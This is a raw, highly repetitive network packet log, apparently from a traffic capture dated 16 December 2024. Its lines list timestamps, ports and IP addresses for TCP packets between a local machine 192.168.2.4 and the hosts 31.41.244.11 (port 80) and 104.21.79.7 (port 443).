                                                                                                                                                                                              Dec 16, 2024 01:01:43.262784958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.263889074 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.263906956 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.263931036 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.263947010 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.264940977 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.264981985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.265032053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.265070915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.266104937 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.266371965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.266415119 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.267384052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.267401934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.267443895 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.268507957 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.268556118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.268618107 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.269757986 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.269776106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.269795895 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.269804001 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.269840002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.270979881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.271015882 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.271024942 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.271059036 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.272075891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.272121906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.272182941 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.272226095 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.273317099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.273363113 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.273386955 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.273432016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.274446011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.274493933 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.274560928 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.274605036 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.275779963 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.275818110 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.275827885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.275859118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.276830912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.276875973 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.276953936 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.276998043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.278016090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.278426886 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.278470039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.279397011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.279433012 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.279479027 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.280478001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.280525923 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.280582905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.281636953 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.281644106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.281677008 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.281693935 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.281734943 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.283128977 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.283164978 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.283178091 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.283209085 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.284220934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.284255981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.284267902 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.284297943 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.285296917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.285335064 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.285379887 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.286338091 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.286609888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.286655903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.287698030 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.287734032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.287784100 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.288749933 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.288810968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.288850069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.288954020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.289908886 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.289967060 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.290005922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.291148901 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.291196108 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.291227102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.291277885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.292336941 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.292444944 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.292493105 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.293474913 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.293528080 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.293706894 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.294807911 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.294843912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.294855118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.294877052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.295875072 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.296107054 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.296152115 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.297039986 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.297252893 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.297277927 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.297297955 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.298278093 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.298451900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.298469067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.298497915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.299463034 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.299513102 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.299581051 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.299623966 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.300657988 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.300704002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.300760984 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.300801992 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.301863909 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.301922083 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.301961899 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.303105116 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.303143978 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.303188086 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.304269075 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.304317951 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.304346085 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.305388927 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.305435896 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.305509090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.306982040 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.307017088 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.307029009 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.307060003 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.307982922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.308020115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.308070898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.309153080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.309189081 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.309236050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.310242891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.310288906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.310516119 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.311486006 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.311522007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.311532021 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.312596083 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.312643051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.312649965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.312693119 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.313777924 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.313832045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.313915968 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.313958883 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.315085888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.315123081 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.315133095 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.315165043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.316257000 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.316293955 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.316303968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.316337109 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.317424059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.317471981 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.317588091 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.317631960 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.318500042 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.318545103 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.318574905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.318618059 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.319771051 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.319808960 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.319818020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.319850922 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.320857048 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.320903063 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.320971966 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.321013927 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.322067976 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.322113991 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.386181116 CET44349854104.21.79.7192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.386404037 CET44349854104.21.79.7192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.386476040 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:43.400583982 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:43.400607109 CET44349854104.21.79.7192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.400625944 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:43.400633097 CET44349854104.21.79.7192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.452241898 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.452297926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.452361107 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.452420950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.452552080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.452605009 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.453715086 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.453766108 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.453785896 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.454739094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.454855919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.454914093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.454958916 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.456022024 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.456078053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.456221104 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.457250118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.457274914 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.457307100 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.457480907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.457531929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.458391905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.458610058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.458658934 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.459656000 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.459713936 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.459743023 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.459985018 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.460834026 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.460885048 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.460978031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.461025953 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.461982012 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.462034941 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.462215900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.462266922 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.463349104 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.463385105 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.463396072 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.463438034 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.464406013 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.464457989 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.464508057 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.464555979 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.465600967 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.465653896 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.465658903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.465707064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.466747999 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.466799974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.466829062 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.466878891 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.468106985 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.468161106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.468239069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.468288898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.469156027 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.469206095 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.469214916 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.469263077 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.470340967 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.470391035 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.470561981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.470611095 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.471667051 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.471703053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.471716881 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.471748114 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.472665071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.472718000 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.472815990 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.472865105 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.473901033 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.474050045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.474102974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.475222111 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.475259066 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.475311041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.476311922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.476365089 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.476418018 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.477504015 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.477557898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.477560043 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.478667974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.478720903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.478776932 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.478828907 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.479837894 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.479960918 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.480005980 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.481062889 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.481175900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.481201887 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.481232882 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.482283115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.482328892 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.482337952 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.482386112 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.483397007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.483448982 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.483643055 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.483695030 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.484662056 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.484714985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.484719038 CET804984831.41.244.11192.168.2.4
